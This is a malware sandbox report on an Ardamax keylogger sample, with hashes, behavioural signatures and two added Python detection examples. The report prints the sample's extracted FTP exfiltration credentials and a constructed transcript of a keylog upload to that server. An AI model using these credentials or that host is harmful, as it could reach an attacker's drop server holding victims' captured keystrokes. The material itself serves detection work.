General

  • Target

    d2d065a3a3af267094c0a1a628284090_JaffaCakes118

  • Size

    264KB

  • Sample

    241207-rchg4szlcp

  • MD5

    d2d065a3a3af267094c0a1a628284090

  • SHA1

    df6a3afe19193c074df0aced10e7e3be405d4ce0

  • SHA256

    d9d714f69e5da9beb4d44b2ec26d57abf654e03c562bbc18a1ca06272a9cb570

  • SHA512

    3e29247b30f2b2c912e199e07c8379f4652d7818741d582531316a83c1ea3a9e19bbc6cf40913e4bb57501b6a182eb7f5895d925fc9d48b984ea510f7227a558

  • SSDEEP

    6144:AmpyGgro0YEApz1Tu80xC19YrNJzH/AchAmJsqzcQQMxLXk4h:Av2EahTu86CUr/eKTcQrXBh

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    ftp.lua.pl
  • Port:
    21
  • Username:
    mhhm
  • Password:
    lukasz50
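
The extracted configuration above is the sample's exfiltration channel: an FTP account with cleartext credentials on port 21. That makes it directly usable for detection, because every upload of captured keystrokes must present the same USER/PASS pair on the wire. The following is an added example (not part of the sandbox report or the vendor's tooling) that parses an FTP control-channel transcript and checks it against the extracted credentials; the transcript, file name and addresses are constructed, and the 192.0.2.0/24 and 203.0.113.0/24 ranges are documentation addresses.

```python
"""Match an observed FTP control session against credentials extracted from
the sample. Added example; transcript and names below are constructed."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Set

# Transcribed from the report's "Extracted / Credentials" block.
EXTRACTED_CONFIG = {"host": "ftp.lua.pl", "port": 21,
                    "username": "mhhm", "password": "lukasz50"}


@dataclass
class FtpSession:
    user: Optional[str] = None
    password: Optional[str] = None
    logged_in: bool = False            # PASS answered with 230
    uploads: List[str] = field(default_factory=list)  # STOR/APPE targets


def parse_ftp_control(transcript: str) -> FtpSession:
    """Walk a cleartext FTP control channel line by line.

    Client commands carry no numeric prefix; server replies start with a
    three-digit code followed by a space (or '-' for multi-line replies).
    """
    session = FtpSession()
    pending = None  # last client verb awaiting a reply
    for raw in transcript.splitlines():
        line = raw.strip()
        if not line:
            continue
        reply = re.match(r"^(\d{3})[ -]", line)
        if reply:
            if pending == "PASS" and int(reply.group(1)) == 230:
                session.logged_in = True
            pending = None
            continue
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        pending = verb
        if verb == "USER":
            session.user = arg
        elif verb == "PASS":
            session.password = arg
        elif verb in ("STOR", "APPE"):
            session.uploads.append(arg)
    return session


def match_extracted_config(session: FtpSession, dst_host: str, dst_port: int,
                           config: dict = EXTRACTED_CONFIG) -> Set[str]:
    """Return the config fields the observed session agrees with."""
    matched = set()
    if dst_host.lower() == config["host"]:
        matched.add("host")
    if dst_port == config["port"]:
        matched.add("port")
    if session.user == config["username"]:
        matched.add("username")
    if session.password == config["password"]:
        matched.add("password")
    return matched


def is_exfil_to_configured_server(session: FtpSession, dst_host: str,
                                  dst_port: int) -> bool:
    """Strong indicator: the exact username/password pair plus a successful
    login. Host alone is weak (DNS changes, shared hosting); port 21 is not
    an indicator at all."""
    matched = match_extracted_config(session, dst_host, dst_port)
    return {"username", "password"} <= matched and session.logged_in


# Constructed transcript of what an upload of the keylog would look like.
SAMPLE_TRANSCRIPT = """\
220 FTP server ready.
USER mhhm
331 Password required for mhhm
PASS lukasz50
230 User mhhm logged in
TYPE I
200 Type set to I
PASV
227 Entering Passive Mode (192,0,2,10,195,80)
STOR keylog_2024-12-07.html
150 Opening BINARY mode data connection
226 Transfer complete
QUIT
221 Goodbye.
"""

# Constructed benign session to the same host: anonymous login, no match.
BENIGN_TRANSCRIPT = """\
220 FTP server ready.
USER anonymous
331 Password required for anonymous
PASS guest@example.invalid
230 Anonymous access granted
QUIT
221 Goodbye.
"""

if __name__ == "__main__":
    s = parse_ftp_control(SAMPLE_TRANSCRIPT)
    print(s, is_exfil_to_configured_server(s, "ftp.lua.pl", 21))
```

The username/password pair is the indicator to alert on; the destination host is worth a block at the egress proxy, but an alert keyed only on `ftp.lua.pl` would also fire on legitimate users of a shared hosting provider.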

Targets

    • Target

      d2d065a3a3af267094c0a1a628284090_JaffaCakes118

    • Ardamax

      A keylogger first seen in 2013.

    • Ardamax family

    • Ardamax main executable

    • Checks computer location settings

      Looks up the country code configured in the registry, likely a geofencing check.

    • Executes dropped EXE

    • Loads dropped DLL

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Indicator Removal: File Deletion

      Adversaries may delete files left behind by the actions of their intrusion activity.

    • Drops file in System32 directory
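
The signatures above are each a pattern over the sandbox's event stream; several of them (executes dropped EXE, loads dropped DLL, file deletion) are stateful, because they depend on which files the sample itself wrote earlier. The following is an added example, not the sandbox vendor's code, that replays constructed Sysmon-style events through equivalent rules. The registry and file paths each rule keys on are assumptions about what the signature inspects (the well-known locations for the data described, not values taken from the report), and every event, path and process name below is constructed.

```python
"""Replay constructed Sysmon-style events through rules equivalent to the
behavioural signatures listed in the report. Added example; the paths the
rules key on are assumptions, not values from the report."""
import re
from typing import Dict, List, Set

# Assumed locations: per-user region setting and the per-machine list of
# installed software. Both are standard Windows keys.
GEO_KEY = re.compile(r"\\Control Panel\\International\\Geo\\Nation$", re.I)
UNINSTALL_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\", re.I)
SYSTEM32 = re.compile(r"^C:\\Windows\\System32\\", re.I)


def evaluate(events: List[dict]) -> Dict[str, List[str]]:
    """Single pass over events in time order. Returns signature -> evidence.

    'dropped' tracks files written by the sample or its children so that
    process creation, image load and deletion can be judged relative to
    what the sample itself produced rather than by path alone.
    """
    hits: Dict[str, List[str]] = {}
    dropped: Set[str] = set()

    def hit(name: str, evidence: str) -> None:
        hits.setdefault(name, []).append(evidence)

    for ev in events:
        kind = ev["EventType"]
        if kind == "FileCreate":
            path = ev["TargetFilename"]
            dropped.add(path.lower())
            if SYSTEM32.search(path):
                hit("Drops file in System32 directory", path)
        elif kind == "ProcessCreate":
            if ev["Image"].lower() in dropped:
                hit("Executes dropped EXE", ev["Image"])
        elif kind == "ImageLoad":
            if ev["ImageLoaded"].lower() in dropped:
                hit("Loads dropped DLL", ev["ImageLoaded"])
        elif kind == "RegistryEvent":
            key = ev["TargetObject"]
            if GEO_KEY.search(key):
                hit("Checks computer location settings", key)
            elif UNINSTALL_KEY.search(key):
                hit("Checks installed software on the system", key)
        elif kind == "FileDelete":
            path = ev["TargetFilename"]
            # T1070.004: the sample removes a file it created itself.
            if path.lower() in dropped:
                hit("Indicator Removal: File Deletion", path)
    return hits


# Constructed event sequence for one sandbox run (simplified Sysmon fields).
SAMPLE_EVENTS = [
    {"EventType": "FileCreate", "Image": r"C:\Users\victim\sample.exe",
     "TargetFilename": r"C:\Users\victim\AppData\Local\Temp\inst.bat"},
    {"EventType": "FileCreate", "Image": r"C:\Users\victim\sample.exe",
     "TargetFilename": r"C:\Windows\System32\updater\svc.exe"},
    {"EventType": "FileCreate", "Image": r"C:\Users\victim\sample.exe",
     "TargetFilename": r"C:\Windows\System32\updater\hook.dll"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\updater\svc.exe"},
    {"EventType": "ImageLoad", "Image": r"C:\Windows\System32\updater\svc.exe",
     "ImageLoaded": r"C:\Windows\System32\updater\hook.dll"},
    {"EventType": "ImageLoad", "Image": r"C:\Windows\System32\updater\svc.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},   # system DLL, no hit
    {"EventType": "RegistryEvent", "Image": r"C:\Windows\System32\updater\svc.exe",
     "TargetObject": r"HKCU\Control Panel\International\Geo\Nation"},
    {"EventType": "RegistryEvent", "Image": r"C:\Windows\System32\updater\svc.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SomeApp"},
    {"EventType": "FileDelete", "Image": r"C:\Users\victim\sample.exe",
     "TargetFilename": r"C:\Users\victim\AppData\Local\Temp\inst.bat"},
    {"EventType": "FileDelete", "Image": r"C:\Users\victim\sample.exe",
     "TargetFilename": r"C:\Users\victim\Downloads\notes.txt"},   # not dropped, no hit
]

if __name__ == "__main__":
    for name, evidence in evaluate(SAMPLE_EVENTS).items():
        print(f"{name}: {evidence}")
```

The point of the stateful rules is precision: a process starting from System32 or a DLL loading is normal; the same events become signal only once the path is known to have been written by the sample during the run.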

MITRE ATT&CK Enterprise v15

Tasks
